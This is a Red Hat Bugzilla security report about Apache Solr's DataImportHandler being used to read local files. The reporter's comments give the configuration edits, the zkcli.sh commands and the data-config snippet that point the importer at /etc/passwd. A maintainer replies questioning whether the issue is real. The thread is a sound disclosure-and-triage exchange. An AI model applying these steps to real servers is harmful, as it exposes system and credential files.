Bug 1289854 - apache solr: export data in datahandler
apache solr: export data in datahandler
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
Unspecified Unspecified
unspecified Severity high
: ---
: ---
Assigned To: Red Hat Product Security
: Security
Depends On:
  Show dependency treegraph
Reported: 2015-12-09 02:38 EST by liaoxinxi
Modified: 2016-02-02 01:10 EST (History)
3 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2016-02-02 01:10:18 EST
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description liaoxinxi 2015-12-09 02:38:00 EST
solr dataimporthandler lead to data export when the debug and verbose switch is on. a remote hacker can turn on the dataimporthandler with some config file. As we all know, the data import feature can import any file, if this feature is not enabled, we can turn the feature by modifying the configuration file, do the steps described here. This file can also be a sensitive file system, such as /etc/passwd, and solr system provides debugging, open it to get sensitive information, the following information is the request:

POST /solr/gettingstarted_shard1_replica2/dataimport HTTP/1.1

we can get the response:

HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Content-Length: 2917

        null,"----------- row #1-------------",
Comment 1 Jason Shepherd 2016-01-03 20:32:47 EST
Thanks liaoxini for reporting this issue. I think the Solr Java process would only have access to read files which it's Unix user has access to. Therefore if you have access to the filesystem to modify configuration you could just read the /etc/passwd file without solr.

Could you provide more details about how a remote hacker could "can turn on the dataimporthandler with some config file"? If it's possible to modify configuration remotely, that could be a security issue.
Comment 2 liaoxinxi 2016-01-12 03:57:39 EST
I'm sorry, I forgot the steps how to turn dataimporter function remotely. 
The first step: ./ server / scripts / cloud-scripts / zkcli.sh -zkhost -cmd getfile /configs/solr/solrconfig.xml solrconfig.xml 
add the following:

<lib dir = "$ {solr.install.dir: ../../../../ dist}"> regex = ".. solr-dataimporthandler - * \ jar" />

   <requestHandler name = "/ dataimport" class = "solr.DataImportHandler">
     <lst name = "defaults">
       <str name = "config"> solr-data-config.xml </ str>
     </ lst>
   </ requestHandler>
then upload 

Step 2: Upload solr-data-config.xml, which reads as follows:
     <dataSource type = "BinFileDataSource" />
         <entity name = "tika-test" processor = "TikaEntityProcessor"
                 url = "/ etc / passwd" format = "text">
                 <field column = "text" name = "text" />
         </ entity>
     </ document>
</ dataConfig>

./server/scripts/cloud-scripts/zkcli.sh -zkhost -cmd putfile /configs/gettingstarted/solr-data-config.xml solr-data-config.xml

step 3: from web interface, press reloads, reload the configuration.

step 4:  send post request
Comment 3 Jason Shepherd 2016-01-13 01:12:33 EST
After install the 'solr' package on Fedora 22, and 23, I don't see the zkcli.sh command. There are the files installed:

[root@336a10ac27fb /]# rpm -ql solr

Can you check you make sure you obtained Solr from the Fedora repositories?

[root@336a10ac27fb /]# dnf provides solr
solr-4.10.3-3.fc22.noarch : Ultra-fast Lucene-based Search Server
Repo        : fedora

If you've obtained Solr directly from Apache, I'd suggest you contact Apache about this issue via security@apache.org.

Note You need to log in before you can comment on or make changes to this bug.